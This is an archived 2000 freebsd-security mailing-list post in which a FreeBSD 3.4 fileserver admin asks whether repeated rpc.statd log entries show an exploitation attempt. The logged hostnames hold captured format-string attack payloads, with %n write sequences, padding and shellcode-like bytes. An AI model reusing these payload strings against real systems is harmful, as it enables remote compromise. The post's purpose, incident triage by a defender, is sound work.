Date: Thu, 17 Aug 2000 16:23:34 -0500 (CDT) From: David La Croix <dlacroix@cowpie.acm.vt.edu> To: freebsd-security@freebsd.org Subject: rpc.statd -- is someone trying to exploit a buffer overflow? Message-ID: <200008172123.RAA16515@cowpie.acm.vt.edu>
next in thread | raw e-mail | index | archive | help
I manage a fileserver for my company, and it happens to be running FreeBSD 3.4-Stable (April 10) with NFS enabled: I've noticed repeated messages of the form: DATE maurice rpc.statd: invalid hostname to sm_stat: lots of binary crap. The binary stuff takes on 2 values: Aug 9 07:02:40 maurice rpc.statd: invalid hostname to sm_stat: ^Xw^??^Xw^??^Yw^ ??^Yw^??^Zw^??^Zw^??^[w^??^[w^??%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n% 192x%n^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P and Aug 9 17:22:50 maurice rpc.statd: Invalid hostname to sm_mon: ^Dw^??^Dw^??^Ew^? ?^Ew^??^Fw^??^Fw^??^Gw^??^Gw^??%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%n^P^P^P^P^P^P^P^P^P^P^P^P^P^P^ P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^PkK^ v,^Cn ^M^(^CF ^0^Cn ^M^.^CF ^CC ^Ck# ^41@^Cn ^HF'^HF*^CF ^HF+ F80+, s^MN,^MV8M all told, there have been a total of 49 entries like this in the log of this one server. Can ANYBODY explain what these messages mean? Is it an attempt by someone to exploit a buffer overflow via bad DNS? Is someone (script kiddie) trying to hack boxes all over the place that have a old rpc.statd? Is there anything I should be concerned about? (I am about to enable firewall code on the box in question to block access to RPC and other stuff from outside the immediate lan. Just a little tricky doing this on a production box while people are working). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200008172123.RAA16515>